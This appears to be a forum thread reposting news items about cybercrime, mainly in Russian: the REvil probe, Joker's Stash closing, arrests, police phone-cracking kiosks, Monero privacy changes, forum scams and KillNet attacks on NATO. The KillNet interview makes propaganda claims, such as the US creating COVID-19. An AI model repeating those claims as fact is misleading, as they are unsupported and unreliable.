Ордер на арест уже подготовлен. Но Николай К., судя по всему, больше не
выезжает за пределы страны и, похоже, провел свой последний отпуск в Крыму.
Тем не менее, дело REvil может стать одним из немногих случаев онлайн- вымогательства, в котором, по крайней мере, выяснена структура банды и установлены личности исполнителей. На след группировки вышли не только немецкие следователи. По данным агентства Reuters, ФБР в США также расследует деятельность группы и, вероятно, внедрилось в нее. Один из лидеров группы, выступающий в Интернете под псевдонимом 0_neday, косвенно подтвердил это. "Сервер был взломан, и они искали меня", - написал 0_neday на форуме для криминальных предложений. "Всем удачи; я ухожу".
**Дополнительное политическое давление
**
Вполне вероятно, что Николай К. также узнал о расследовании. Официально LKA в
Баден-Вюртембурге и ответственная прокуратура земли отказались от комментариев
по поводу ведущегося расследования. Но некоторые из тех, кто вовлечен в это
дело, считают, что важно говорить об успехе расследования. И
продемонстрировать, что немецкие ведомства тоже компетентны в этой области -
хотя бы как сигнал преступникам, что они не уйдут от ответственности. "Это
тревожит, действует как сдерживающий фактор и, возможно, заставит того или
иного преступника в будущем сказать: "Нет, я не буду с этим связываться", -
говорит один из участников расследования.
Некоторые из следователей также разочарованы отсутствием сотрудничества со стороны других стран и считают, что для окончательного изменения ситуации необходимо большее политическое давление. "Если бы кто-то воровал такие суммы денег, грабя банки, давление было бы гораздо сильнее. Но опасность не осознается", - говорит один из чиновников.
Необходимость более активных действий не оспаривается Министерством внутренних дел Германии, которое отвечает за Федеральное управление уголовной полиции и киберстратегию Германии. Они говорят, что угрозы киберпреступности сейчас воспринимаются так же серьезно, как и борьба с терроризмом.
США уже пытаются оказать давление на страны, укрывающие вымогателей выкупа. Во время беседы с президентом России Владимиром Путиным президент США Джо Байден настаивал на достижении соглашения по этому вопросу. И, похоже, был достигнут определенный прогресс. Во всяком случае, российские СМИ сообщили, что обе стороны намерены более тесно сотрудничать в будущем, когда дело дойдет до подобных кибервымогательств. Но, вероятно, пройдет некоторое время, прежде чем LKA в Баден-Вюртемберге увидит преимущества. А до тех пор Николай К. и его жена могут продолжать проводить ночи в роскошных отелях.
*Все имена изменены.
Репортаж Хакана Танриверди и Макса Цирера из Баварского радио.
Источник: [https://www.zeit.de/digital/internet/2021-10/ransomware-group- revil-member-hacker-russia- investigation?utm_referrer=https://t.co/](https://www.zeit.de/digital/internet/2021-10/ransomware- group-revil-member-hacker-russia- investigation?utm_referrer=https%3A%2F%2Ft.co%2F)
"Joker уходит на пенсию. Joker's Stash закрывается навсегда.
Когда мы открылись много лет назад, нас никто не знал. Сегодня мы являемся
одним из крупнейших рынков карт/дампов.
К сожалению, или к счастью - ничто не вечно. Наступило и наше время уйти
навсегда.
Мы оставим Stash открытым еще на 30 дней, до 2021-02-15, чтобы все
пользователи могли потратить остатки на балансах своих аккаунтов.
2021-02-15 мы почистим все наши серверы и удалим все резервные копии, и Joker
исчезнет во тьме навсегда.
И помяните мое слово: мы никогда больше не откроемся! Не верьте возможным
будущим самозванцам!
После 2021-02-15 больше не будет ни самого Джокера, ни Joker's Stash.
Уважаемые партнеры Stash - можете быть уверены, что перед тем, как мы уйдем
навсегда, вы получите все выплаты, свяжитесь со мной сами знаете как.
Мы также хотим пожелать всем молодым и также старым опытным кибер-жуликам не
потерять самого себя в погоне за легкими деньгами.
Помните, что даже все деньги в мире никогда не сделают вас счастливыми и что
все самое по-настоящему ценное в этой жизни -
бесплатно."
Ушла эпоха, господа!
Гражданин Российской Федерации Антон Богданов 1985 года рождения был задержан в среду днем в международном аэропорту острова Пхукет полицией Таиланда по запросу США, суть обвинений неизвестна, сообщил РИА Новости заведующий консульским отделом посольства РФ в Таиланде Владимир Пронин.
"Россиянин был задержан по прибытии в аэропорт острова Пхукет, куда он приехал отдыхать с женой. Богданову разрешили уведомить посольство, и он сообщил мне по телефону, что задержание осуществляли таиландские полицейские, однако при этом присутствовал сотрудник ФБР США", — сообщил агентству дипломат.
"Вечером Богданов был доставлен в Бангкок, в полицейское управление по борьбе с преступностью, где он находится и сейчас", — сказал Пронин. Консул также сообщил РИА Новости, что сейчас направляется в полицейское управление, чтобы встретиться с россиянином.
В полицейском рапорте о задержании гражданина РФ и ордере на его арест, копии которых получили российские дипломаты, говорится, что россиянин был задержан по запросу США о его экстрадиции. В чем именно обвиняется Богданов в Америке, в таиландских полицейских документах не сказано.
Инцидент с Богдановым — четвёртый случай задержания россиян в Таиланде по запросам США с 2008 года, когда в Бангкоке был арестован российский бизнесмен Виктор Бут. США обвинили его в подготовке сговора с целью убийства американцев и материальной поддержки терроризма, и вывезли в США с нарушениями таиландского и американского законодательства.
В настоящее время в Таиланде слушается дело об экстрадиции в США россиянина Дмитрия Украинского, арестованного в 2016 году, его обвиняют в хакерстве и отмывании денег в особо крупном размере. На Украинского поступил и запрос об экстрадиции от России, и он был удовлетворён таиландские судом с условием, что разрешение на экстрадицию в Россию вступит в силу только по окончании рассмотрения американской заявки.
Ещё один россиянин, Сергей Медведев, обвиненный США в хакерстве, был арестован в Таиланде в феврале 2018 года.
Утром 17 ноября Федеральная служба безопасности России заблокировала доступ к бизнес-центру «Сенатор» в Санкт-Петербурге. В одном из офисов проводился обыск криптовалютного обменника.
Как сообщает издание «Фонтанка» со ссылкой на собственные источники, данный криптовалютный обменник использовался для обналичивания преступных средств. Общий объем обналиченных денег превысил 1.5 млрд рублей. Отметим, что обыски проходили не только в Санкт-Петербурге, но и в Москве. Арендаторы помещений в бизнес-центре «Сенатор» не могли попасть в свои офисы до 13:00.
Пока подробностей мало, но уголовное дело, по которому проходили обыски, заведено по 171 статье Уголовного кодекса Российской федерации о незаконном предпринимательстве. Согласно статье, максимальное наказание достигает пяти лет лишения свободы. Однако, возможно, в ходе обысков обнаружат улики для предъявления обвинений и в других преступлениях.
Песков ответил на вопрос о связи задержания REvil с переговорами с США
В России по запросу США задержали предполагаемых членов хакерской группировки REvil. Операцию прокомментировал журналистам пресс-секретарь президента России Дмитрий Песков.
По словам Пескова, в ходе переговоров, состоявшихся в Женеве, президенты России и США рассмотрели вопрос о задержании предполагаемых членов хакерской группы REvil, результатом чего стало начало консультаций между представителями специальных ведомств обеих стран.
«Это, по сути, сотрудничество в борьбе с киберпреступностью. Именно эту тему обсуждали в Женеве два президента», — заявил Песков.
Полиция Шотландии будет взламывать смартфоны с помощью «киберкиосков» Cellebrite
Тогда как компания Apple и ФБР вновь нашли повод для конфликта (снова понадобилось взломать iPhone преступника, что самим правоохранителям оказалось не под силу), у шотландской полиции таких проблем не возникает. [Стало известно](https://www.scotland.police.uk/about-us/police- scotland/specialistcrime-division/cybercrime-investigations-digital- forensics/cyber-kiosks), что шотландцы официально берут на вооружение оборудование компании Cellebrite и вскоре установят в полицейских участках по всей стране 41 специализированный «киберкиоск». Развертывание терминалов должно начаться уже сегодня, 20 января и завершиться к концу мая 2020 года.
Напомню, что израильская компания Cellebrite – это независимые киберкриминалисты, которые специализируются на извлечении данных с мобильных устройств. К примеру, несколько лет назад израильскую фирму называли основным кандидатом на роль подрядчика ФБР, когда правоохранители искали специалистов для взлома iPhone террориста.
Хотя в итоге ФБР воспользовалось услугами других экспертов, кандидатура Cellebrite выглядела вполне обосновано, ведь компания давно и плотно сотрудничает с американской полицией, и правоохранители платят киберкриминалистам [миллионы долларов](https://motherboard.vice.com/read/us- state-police-have-spent-millions-on-israeli-phone-cracking-tech-cellebrite). Стоит отметить, что на рынке существует по крайней мере два подобных решения (компаний Cellebrite и GrayShift), производители которых заявляют, что с их помощь можно подобрать код блокировки и извлечь данные из iPhone любой модели, работающего на актуальной или более старой версии iOS.
Как стало известно, вскоре шотландская полиция будет пользоваться решениями Cellebrite на постоянной основе. Компьютеры общей стоимостью 370 000 фунтов стерлингов будут использоваться для просмотра данных с заблокированных телефонов iOS и Android во время расследований уголовных преступлений. Избранные сотрудники смогут использовать «киберкиоски», когда это возможно, чтобы изучать конфискованные устройства и определять, относятся ли данные на них к конкретным расследованиям и нужно ли отправлять гаджеты в лабораторию для извлечения содержимого. В самих киосках не будет сохраняться никаких копий этих данных. Работу такого «киберкиоска» демонстрирует видео ниже.
Работает взлом смартфонов по-разному: все зависит от комбинации оборудования, операционной системы и ее версии. Дело в том, что это своего рода гонка вооружений — Apple и Google регулярно исправляют уязвимости, используемые для таких атак. Так, Cellebrite заявляет, что порой ее оборудование копирует собственный загрузчик в оперативную память некоторых моделей телефонов и запускает его, чтобы обойти механизмы безопасности ([PDF](https://smarterforensics.com/wp-content/uploads/2014/06/Explaining- Cellebrite-UFED-Data-Extraction-Processes-final.pdf)). В других случаях, например, на устройствах Android, решения Cellebrite пытаются получить root- права. Оборудование также может использоваться для эксплуатации уязвимостей в прошивке устройства, включая iOS-девайсы, для полного извлечения данных.
Неспособность США выйти на переговоры с Россией по безопасности с позиции диалога без открытого давления вполне логично свела на нет и ставки, сделанные на сотрудничество по борьбе с киберугрозами.
Российское руководство более не видит смысла в продолжении борьбы с хакерскими группировками в стране, которая обуславливалась прежними договоренностями с Вашингтоном.
Наблюдаемые на всём протяжении разработки украинского кейса масштабные кибератаки, активизировавшийся DDoS российских государственных и банковских сайтов, которые организуются при очевидном непротивлении, а зачастую и поддержке, американских профильных структур, в условиях нового мирового порядка «лишают сотрудничество смысла».
Ноябрьские «шаги на встречу», сделанные в формате закрытых переговоров с передачей России информации о хакерах, устраивавших массированные атаки на западных игроков, фактически, аннулируются.
Впрочем, судьба уже задержанных кибер-преступников, управлявших программами- вымогателями, пока не ясна, но для Вашингтона сигнал очевиден и… неприятен.
ps:
По мнению эксперта Sony, вложения в Web 2.0 только подстегивают киберпреступников.
Проблема киберпреступности сохраняется на протяжении многих лет и, безусловно, не исчезнет в ближайшее время. По поводу этой проблемы генеральный директор компании Sony сказал: "Решение проблемы киберпреступности – это не двухфакторная идентификация или ответ на секретный вопрос. Решение проблемы киберпреступности заключается в переходе на Web3".
Поскольку "цифровая личность" в Web 2.0 обычно состоит не только из никнейма и фотографии, но и из адреса электронной почты, не существует никакого способа проверить то, кем является человек, зашедший в аккаунт, если у него есть данные от аккаунта и почты. Да, есть двухфакторная аутентификация, но достаточно большая часть пользователей игнорирует ее, подвергая себя опасности. Кроме того, как только компания завладевает данными пользователя, он практически не может контролировать то, что с ними происходит. Таким образом, личная информация пользователей продается, на ее основе создается таргетированная реклама, а повторная продажа лишь увеличивает риск того, что данные попадут к хакерам.
Разберем все по порядку:
Web 2.0 был разработан для доступа к информации – это безусловно важная
функция, но она не способствует защите личной информации. Web 3.0 будет создан
для обеспечения прав и свобод, которые мы имеем везде, кроме интернета.
Но рисовать в голове картины светлого децентрализованного будущего не стоит.
Web 3.0 все еще выглядит не совсем безопасным, так как в его концепции
существует множество рисков, связанных с различным лазейками и уязвимостями,
которые могут вызвать множество проблем в будущем.
**Основатель группы хакеров Killnet, известный под именем KillMilk, заявил в интервью RT о подготовке разоблачений действий Запада. По его словам, гражданская сетевая инфраструктура США — это «полный ноль для безопасности». KillMilk отметил, что главная цель действий Killnet — «дать отпор врагу».
— Почему вы решили атаковать американские серверы именно сейчас? Какие конкретно серверы были взломаны? Что с ними происходит сейчас? **
— Америка — это последний оплот наших действий. Мы прошли по всем запланированным странам. Соединённые Штаты хвастаются своей киберподготовкой, но как выглядит это на самом деле и насколько они имеют опыт в ведении кибервойны — вы увидите в ближайшее время с помощью наших действий. Восемь месяцев мы познавали и ломали Европу, тем временем Штаты всё это время готовились к встрече с нами. Мы только начинаем созидать на территории киберпространства Америки. Я добьюсь высшего положения Killnet в мире IT и снесу имя Америки у всех на глазах. Что было взломано сейчас? Это пустяки. Лучше спросите, что будет дальше с информационным полем Соединённых Штатов.
— Насколько легко взломать американские серверы?
— Если говорить о гражданской сетевой инфраструктуре, то это полный ноль для безопасности.
Это то, что держит имя Штатов. Но гражданский сектор уязвим на 100%, о простых гражданах Америки никто не думает. Значит, будем думать мы.
— Какова конечная цель ваших действий?
— Наша основная цель — отпор врагу и мир на земле. Я не хочу, чтобы моя страна имела пассивные обстоятельства в пределах агрессии Европы и США. Мы не будем биться, мы будем бить.
— Были ли попытки вычислить вас тем или иным способом?
— Конечно, были и есть по сей день. Я не хочу говорить об этом, всё это очень сложно.
— Получали ли вы какую-либо информацию (посредством взлома), которая бы скомпрометировала США и/или уличила бы их во лжи? Если да, пожалуйста, приведите примеры.
— Мы готовим свой огромный пакет доказательств и разоблачения действий США в создании COVID-19. В данный момент идёт завершение собственного расследования по этому делу. Это будет одно из самых громких событий.
— Формально ваша деятельность противозаконна. Насколько боитесь последствий?
— Формально я законопослушный гражданин Российской Федерации. Я не лезу в дела правительства России, я не осуждаю их действий, соответственно, и не совершаю преступления на территории моей родины. Всё, что находится за пределами границы России, — для нас поле битвы, где мы можем реализовать все свои возможности.
— Какова поддержка среди людей за границей, если таковая есть?
— У меня огромная поддержка от моих друзей из SOLARIS — это такая же дерзкая и сильная команда из даркнета. Я не знаю, откуда они, но я знаю этих профессионалов очень давно. Благодаря их вниманию в нашу сторону Killnet остаётся на полном ходу. Также наша семья — это наши подписчики из Telegram — являются для нас сильной опорой, за что благодарим их.
— Как вы думаете, насколько сильно влияют ваши действия на США в целом?
— Пока что мы просто эхо будущих проблем для Штатов. Пока что! Но CNN уже даёт нехорошие прогнозы. Слава России!
Source: <https://russian.rt.com/world/article/1059107-killnet-hakery-ssha- razoblachenie>
Из-за новых алгоритмов отследить киберпреступника стало невозможно.
Токен Monero 13 августа в ходе запланированного хардфорка представил новые функции для повышения конфиденциальности и безопасности. Завершенный на блоке 2 688 888 хардфорк теперь отличается следующими обновлениями:
Это обновление представляет собой хардфорк, основанный на 0.18 « Fluorine Fermi », поэтому новая версия не имеет обратной совместимости со старыми. Тем, кто хочет продолжить использовать Monero, придется обновить свое ПО (monerod, monero-wallet-cli, monero-wallet-gui). Пользователям аппаратных кошельков потребуется обновление прошивки от производителя устройства, чтобы продолжить их использование.
Считается, что Monero обладает более высокой конфиденциальностью по сравнению с другими криптовалютами из-за своего механизма обфускации транзакций «кольцевой подписи». Когда транзакция требует подписи, пользователь, выполняющий ее, объединяет свою подпись с подписями других пользователей, чтобы создать двусмысленность в анализе цепочки блоков и практически затруднить отслеживание.
В предыдущей версии Monero поддерживала фиксированное количество из 11 подписантов, IP-адреса которых были скрыты за специальным протоколом под названием «Одуванчик++ (Dandelion++)», и все они были встроены в сеть.
[](https://www.bleepstatic.com/images/news/u/1220909/Diagrams/monero- ring.gif)
Сеть подписантов транзакций Monero
Новое обновление Monero увеличивает размер кольца до 16, что является самым большим увеличением в истории проекта, значительно улучшив анонимность и запутывание транзакций. Разработчики считают 16 идеальным числом на данный момент, учитывая увеличение размера блокчейна и дополнительную нагрузку на сеть.
Поскольку почти невозможно отследить подписантов, Monero используется группами вымогателей и криптомайнинга, а также является стандартным способом оплаты в даркнете. В связи с закрытием блокчейн-миксера Tornado Cash киберпреступники могут перейти на Monero, который создан с учетом анонимности.
Более того, Monero не использует традиционный публичный реестр, а имеет «ключи просмотра» для просмотра транзакций в блокчейне, что делает отслеживание средств с одного адреса на другой невыполнимой задачей.
source: getmonero.org/2022/08/11/monero-GUI-0.18.1.0-released.html
Об этом стало известно благодаря исследователям из Digital Shadows, которые по наводке перешли к одной из веток на форуме XSS. В этой ветке специалисты обнаружили переписку администратора и модератора форума Altenen с анонимным пользователем. Altenen – это англоязычный форум, на котором уже более девяти лет пользователи обсуждают способы законного (и не очень) заработка в интернете. Как и многие подобные сайты, Altenen обрабатывает платежи через систему условного депонирования (условное депонирование или эскроу – транзакции, которые проходят только после выполнения определенного условия).
В случае, который рассмотрели исследователи, пользователь форума купил ноутбук у другого пользователя, а затем попросил модератора подтвердить получение денег продавцом. Однако, вместо этого модератор потребовал у пользователя 120 долларов за условное депонирование. Еще немного поторговавшись с модератором, пользователь заплатил 80 долларов. Однако, когда покупка сорвалась и пользователь потребовал вернуть деньги, модератор прекратил общение. Как выяснилось дальше из сообщений администратора, весь инцидент был тщательно спланирован заранее.
Исследователи также изучили и другой инцидент – пользователь пытался получить статус проверенного продавца, чтобы иметь возможность продавать вредоносное ПО типа memory scraper для POS-терминалов. Пользователь получил два предложения – заплатить 500 долларов или разработать и развернуть на форуме вредоносное ПО для кражи биткоинов.
В Digital Shadows пояснили, что не все пользователи, обратившиеся к мошенникам, в итоге становились их жертвами. Как признавались сами мошенники, они не выбирали в качестве жертв мусульман и “больших шишек” форума.
source:
infosecurity-magazine.com/news/cybercrime-forum-admins-spotted
digitalshadows.com/blog-and-research/theres-no-honor-among-thieves-carding-
forum-staff-defraud-users-in-an-escrow-scam
Анонимный кибер преступник под ником «Ryushi» выложил на профильном форуме
(https://habr.com/ru/news/t/707660/) с утечками на продажу базу данных 400
млн пользователей Twitter.
«Ryushi» утверждает, что данные были скопированы с помощью эксплуатации уязвимости нулевого дня, они включают электронные письма и номера телефонов знаменитостей, политиков, компаний, обычных пользователей, а также множество других конфиденциальных данных.
В
качестве подтверждения продавец предоставил фрагмент данных 1000
пользователей, в котором есть данные создателя криптовалюты Ethereum Виталика
Бутерина, основателя Apple Стива Возняка, миллиардера Марка Кьюбана,
специалиста по кибербезопасности Брайана Кребса и других популярных личностей.
Независимые
ИБ-исследователи подтвердили подлинность данных в выложенном в открытом
доступе файле.
Хакер шантажирует Илона Маска слитой базой данных и предлагает владельцу Twitter срочно выкупить данные и избежать судебных исков и штрафов, пока информацию не купил кто-нибудь другой.
В случае обнародования информации по утечке Twitter грозят многомиллионные штрафы от регуляторов в США и ЕС. В Евросоюзе с Twitter могут взыскать до 4% от годового оборота компании.
Пока что Маск и Twitter официально не отреагировали на угрозы хакера.
]Аналитики из компании Trend Micro изучили пять англоязычных хак-форумов (Sinister, Cracked, Breached, Hackforums и ныне закрытый Raidforum), а также пять русскоязычных хакерских сайтов (XSS, Exploit, Vavilon, BHF и WWH), чтобы прийти к интересному выводу: не менее 30% посетителей андеграундных ресурсов составляют женщины.
Так как на сайтах для киберпреступников во главе угла обычно стоит анонимность, исследователям пришлось прибегнуть к помощи таких инструментов, как Semrush и uClassify Gender Analyzer V5 (и даже с учетом этого методология исследования может вызывать сомнения), а в качестве контрольной выборки данные сравнивали со Stack Overflow и Reddit.
В итоге, после анализа с помощью Semrush, выяснилось, что около 40% посетителей англоязычных хак-форумов – это женщины. На российских андеграундных ресурсах женщин оказалось еще больше — 42,6%.
По данным аналитиков, наибольшее количество женской аудитории среди изученных сайтов привлек Sinister — 61% пользователей женского пола. Интересно, что при этом среди посетителей Stack Overflow насчитывается лишь 12% женщин.
Анализ с помощью Gender Analyzer V5 показал немного иную картину. К примеру, эксперты изучили контрольную группу из 10 пользователей, которые размещали свои профили в интернете и называли себя женщинами на XSS и hackforums[.] После прогона сообщений этих пользователей через анализатор текста, выяснилось, что все профили классифицированы как женские с точностью 82,4%.
Затем специалисты Trend Micro проверили 50 случайных учетных записей с форума XSS (средняя учетная запись была создана примерно 31 месяц назад и содержала около 704 сообщений). На этот раз текстовый анализатор показал, что из 50 случайных пользователей 70% были мужчинами и 30% — женщинами.
Аналогичная проверка 50 случайных профилей была проведена на Hackforums, где средний возраст аккаунта составлял 32 месяца, и тот содержал примерно 947 сообщений. Результаты показали, что в 64% случаев профили принадлежали мужчинам и в 36% случаев — женщинам.
В конце своего отчета эксперты резюмируют, что киберпреступные сообщества, похоже, можно назвать куда более меритократическими, чем сообщества white hat’ов:
«Принято считать, что большинство киберпреступников — мужчины. Однако гендерная предвзятость (явная или скрытая) может серьезно повлиять на уголовное расследование. Правоохранительные органы и другие следователи не должны делать автоматические предположения о поле преступника. Наш анализ показал, что не менее 30% участников андеграундных форумов могут быть женщинами, даже если они открыто не обсуждают свои гендерные профили в сети.
Криминальные андеграунд — одно из самых меритократических онлайн-сообществ, и когда доходит до ведения дел, людей здесь ценят исключительно за их навыки и опыт, а не за их пол».
• Source: [https://www.trendmicro.com/vinfo/ru...rime-and-digital- threats/gender-in- cybercrime](https://www.trendmicro.com/vinfo/ru/security/news/cybercrime-and- digital-threats/gender-in-cybercrime)
Знаю пару девчюль
Вы молодци я вас обожаю .
KillNet Claims Creating Gay Dating Profiles with NATO Logins
In an announcement on Telegram, the Russian KillNet hacker group claimed to have targeted NATO with DDoS attacks, stolen plain-text login credentials and used them to create accounts on a gay dating portal in Kyiv and Moldova.[/HEADING]
KillNet, a pro-Russian group of hacktivists, has claimed responsibility for a series of Distributed Denial of Service (DDoS) attacks on NATO’s cyberinfrastructure and breaching its security to steal data.
According to the group, KillNet claims it carried out cyberattacks that resulted in the “paralysis” of 40% of NATO’s electronic infrastructure.
The group made the announcement on its Telegram channel, where it listed its targets and leaked NATO email addresses and plain-text passwords that it claimed to have stolen from NATO School, apparently the NATO School Oberammergau (NSO).
In addition to the data leak, KillNet also shared a screenshot showing that it had used the alleged stolen login credentials to register 150 email addresses on a gay dating portal in Kyiv and Moldova, suggesting a possible motive of embarrassment or blackmail.[](https://www.hackread.com/wp- content/uploads/2023/04/pro-russian-hacktivist-killnet-claims-cyber-attacks- on-nato-leaks-stolen-data.jpg)
On left, KillNet registers alleged stolen NATO credentials on gay dating sites – On the right, the stolen credentials including email addresses and passwords (Screenshot from Telegram – Source: Hackread.com)
The tactics employed by KillNet should not come as a surprise, as both sides in the conflict between Russia and Ukraine have been utilizing social engineering skills in their efforts to gain advantage over each other.
Just last week, [Hackread.com reported](http://The tactics employed by KillNet should not come as a surprise, as both sides in the conflict between Russia and Ukraine have been utilizing social engineering skills in their efforts to gain advantage over each other. Just last week, reports emerged of Ukrainian hacktivists luring Russian military wives into a %22patriotic photoshoot%22 and successfully extracting personal and Russian military- related details during the process. This highlights the use of such tactics by both sides in the ongoing cyber warfare, where hacktivist groups like KillNet and Ukrainian counterparts are leveraging social engineering techniques to gather sensitive information and disrupt their adversaries.) how Ukrainian hacktivists lured Russian military wives into a “patriotic photoshoot” and successfully extracted personal and Russian military-related details during the process.
This highlights the use of such tactics by both sides in the ongoing cyber warfare, where hacktivist groups like KillNet and Ukrainian counterparts are leveraging social engineering techniques to gather sensitive information and disrupt their adversaries.
Here’s what KillNet had to say on its Telegram about their latest attack on NATO. The following text was translated from Russian to English using the Yandex translation bot on Telegram.40% of NATO's electronic infrastructure was paralyzed due to hackers from KillNet. Cybergospoda put the sites of defence orders, provision and support of the alliance and another pack of sites, without which it will be difficult to work normally.
Resources are being put under DDoS attacks right now, it is impossible to log in to accounts. The sites of the command for the development of combat operations, the NATO agency for support, support and procurement, and training cyber centres were distributed. And the NCI agency was hacked for sweet, from where they stole all the personal data of employees (a portal for people making important political decisions).
And this means that at least in the near future, comrades will drink water at the cooler and, clutching their heads, try to return the data.
KillNet first emerged amid the ongoing [Russian invasion of Ukraine](https://www.hackread.com/anonymous-hack-russian-tv-electric- charging-station/), positioning itself as a counter-attack force against the hacktivist group Anonymous. Since then, KillNet has targeted private businesses and critical government websites around the world, including the United Kingdom and Lithuania, among others.
This is not the first time KillNet has claimed data theft from high-profile targets. In December 2021, the group claimed responsibility for stealing data from FBI agents, and in August 2022, [it claimed](https://www.hackread.com/killnet- hackers-hit-lockheed-martin-employee-data/) to have stolen employee data from Lockheed Martin, a leading defence contractor.
The cyber attacks by KillNet highlight the ongoing threat of hacktivist groups and cyber warfare in today’s geopolitical landscape. NATO and other organizations must continue to prioritize cybersecurity and take proactive measures to safeguard their sensitive data from such attacks.
The increasing frequency and sophistication of cyber attacks pose significant challenges to governments, businesses, and individuals alike, and underscore the need for robust cybersecurity measures and international cooperation to [combat cyber threats](https://www.hackread.com/combating- cyber-attacks-2023/).
Click to expand...
RU:
KillNet утверждает, что осуществила кибератаки, которые привели к «параличу» 40% электронной инфраструктуры НАТО.
В объявлении в Telegram российская хакерская группа KillNet заявила, что нацелилась на НАТО с помощью DDoS-атак, украла учетные данные для входа в виде простого текста и использовала их для создания учетных записей на портале знакомств для геев в Киеве и Молдове.
KillNet, пророссийская группа хактивистов, взяла на себя ответственность за серию распределенных атак типа «отказ в обслуживании» (DDoS) на киберинфраструктуру НАТО и нарушение ее безопасности с целью кражи данных.
По данным группы, KillNet утверждает, что осуществила кибератаки, которые привели к «параличу» 40% электронной инфраструктуры НАТО.
Группа сделала объявление на своем канале Telegram, где она перечислила свои цели и просочила адреса электронной почты НАТО и открытые пароли, которые, как она утверждала, были украдены из школы НАТО, по-видимому, из школы НАТО Обераммергау (NSO).
В дополнение к утечке данных KillNet также поделился снимком экрана, показывающим, что он использовал якобы украденные учетные данные для входа в систему для регистрации 150 адресов электронной почты на портале гей- знакомств в Киеве и Молдове, что предполагает возможный мотив смущения или шантажа.
Пророссийская группа хактивистов KillNet заявляет о кибератаках на НАТО и обнародовании украденных данных
Слева KillNet регистрирует предполагаемые украденные учетные данные НАТО на сайтах знакомств для геев. Справа украденные учетные данные, включая адреса электронной почты и пароли (Скриншот из Telegram. Источник: Hackread.com).
Тактика, используемая KillNet, не должна вызывать удивления, поскольку обе стороны в конфликте между Россией и Украиной используют навыки социальной инженерии в своих попытках получить преимущество друг над другом.
Буквально на прошлой неделе Hackread.com сообщал, как украинские хактивисты заманивали жен российских военных на «патриотическую фотосессию» и в ходе этого процесса успешно извлекали личные и связанные с российскими военными подробности.
Это подчеркивает использование такой тактики обеими сторонами в продолжающейся кибервойне, когда группы хактивистов, такие как KillNet и украинские коллеги, используют методы социальной инженерии для сбора конфиденциальной информации и подавления своих противников.
Вот что KillNet написал в своем Telegram о своей последней атаке на НАТО. Следующий текст был переведен с русского на английский с помощью бота- переводчика Яндекса в Telegram.
40% электронной инфраструктуры НАТО было парализовано из-за хакеров из KillNet. Кибергоспода поставила сайты оборонных заказов, снабжения и поддержки альянса и еще пачку сайтов, без которых будет сложно нормально работать.
Ресурсы сейчас подвергаются DDoS-атакам, зайти в аккаунты невозможно. Были распределены сайты командования развития боевых действий, агентства НАТО по обеспечению, поддержке и снабжению, учебные киберцентры. А агентство NCI взломали на сладкое, откуда украли все личные данные сотрудников (портал для людей, принимающих важные политические решения).
А это значит, что как минимум в ближайшее время товарищи будут пить воду у кулера и, схватившись за голову, пытаться вернуть данные.
KillNet впервые появился на фоне продолжающегося российского вторжения в Украину, позиционируя себя как сила контратаки против группы хактивистов Anonymous. С тех пор KillNet нацелен на частные предприятия и важные правительственные веб-сайты по всему миру, включая Великобританию и Литву.
Это не первый раз, когда KillNet заявляет о краже данных у высокопоставленных лиц. В декабре 2021 года группа взяла на себя ответственность за кражу данных у агентов ФБР, а в августе 2022 года заявила, что украла данные сотрудников у Lockheed Martin, ведущего оборонного подрядчика.
Кибератаки KillNet подчеркивают постоянную угрозу со стороны групп хактивистов и кибервойны в сегодняшнем геополитическом ландшафте. НАТО и другие организации должны продолжать уделять первоочередное внимание кибербезопасности и принимать упреждающие меры для защиты своих конфиденциальных данных от таких атак.
Растущая частота и изощренность кибератак создают серьезные проблемы как для правительств, предприятий, так и для отдельных лиц и подчеркивают необходимость надежных мер кибербезопасности и международного сотрудничества для борьбы с киберугрозами.Click to expand...
Source: <https://www.hackread.com/killnet-create-gay-dating-profiles-nato- logins/>
В даркнете практически перестали принимать заказы на «пробивы» людей по базам МВД. А из «Телеграма» массово пропадают аккаунты людей, которые этим занимались. Всё это происходит на фоне «зачистки» московской полиции сотрудниками ФСБ.
Теперь на даркнет-форумах практически нельзя заказать «пробивы» о судимостях, перелётах, пересечениях границ и других данных из баз МВД. Кроме того, удар пришёлся и по персональным телеграм-аккаунтам, которые тоже предоставляли такие услуги. Как рассказали источники «Базы», в последние дни профили этих людей просто массово «исчезают» — и перед этим их взламывают.
Такие «зачистки» начались на фоне массовых проверок УВД по ЦАО и районных ОВД в центре Москвы. (https://t.me/bazabazon/17012) Ещё несколько недель назад ФСБ выяснила, что полицейские занимаются в даркнете платными «пробивами» и, по предварительным данным, выполняют заказы для граждан Украины, сливая им в том числе сведения о российских силовиках. Нескольких сотрудников в итоге уже задержали.
При этом, как стало известно «Базе», сами «пробивщики» обвиняют во всём Алексея Навального и журналиста Христо Грозева. По их мнению, именно они своими расследованиями пару лет назад «спалили всю тему» — тогда же и начались «первые чистки, посадки и проблемы». Сейчас, как считают наши собеседники, это «приняло всеобщие масштабы» из-за СВО.
Источник:

В даркнете практически перестали принимать заказы на «пробивы» людей по базам МВД. А из «Телеграма» массово пропадают аккаунты людей, которые этим занимались. Всё это происходит на фоне «зачистки» московской полиции сотрудниками ФСБ. Теперь на даркнет-форумах практически нельзя заказать...
t.me
В даркнете в последние дни зафиксированы сразу 2 крупных арбитража, связанных со скамом. Проходящие по ним ответчиками сервисы перестали выходить на связь с истцами и в итоге были заблокированы.
На форуме Exploit пользователь Section открыл арбитраж против обменник-миксера крипты WasabiBank (регистрация от декабря 2022 года, ), ее дубль появился и на площадке Zelenka (регистрация от марта 2023 года). Общая сумма претензии составила 80 тысяч долларов (6,4 миллиона рублей).
«Заскамился при произведении услуг обмена и чистки криптовалюты. Также заблокировал в Telegram, удалил переписку и изменил юзернейм», — написал Section.
Из описания услуг, предоставляемых сервисом WasabiBank, можно сделать вывод, что минимальной суммой для обмена или Микса была тысяча долларов. Средняя комиссия за операции составляла 0,5-1,5 процента, также WasabiBank менял крипту на наличные со ставкой 0,5-2 процента. Кроме того, в описании на Zelenka сервис допускал возможность личной выдачи наличных в Дубае (ОАЭ).
Второй крупный скам произошел на WWH Club, там жертвой оказались представители стилера Raccoon, потерявшие на процедуре отмыва криптовалюты 65 тысяч долларов (5,3 миллиона рублей). В этом случае скамом промышлял сервис Joint Mixer (регистрация снова от марта 2023 года).
«Каким-то образом на форуме разрешают размещаться обменникам без депозита. Заскамили на 65 тысяч долларов, не выплатили по обмену. Все чаты удалили», — написал raccoonstealer.
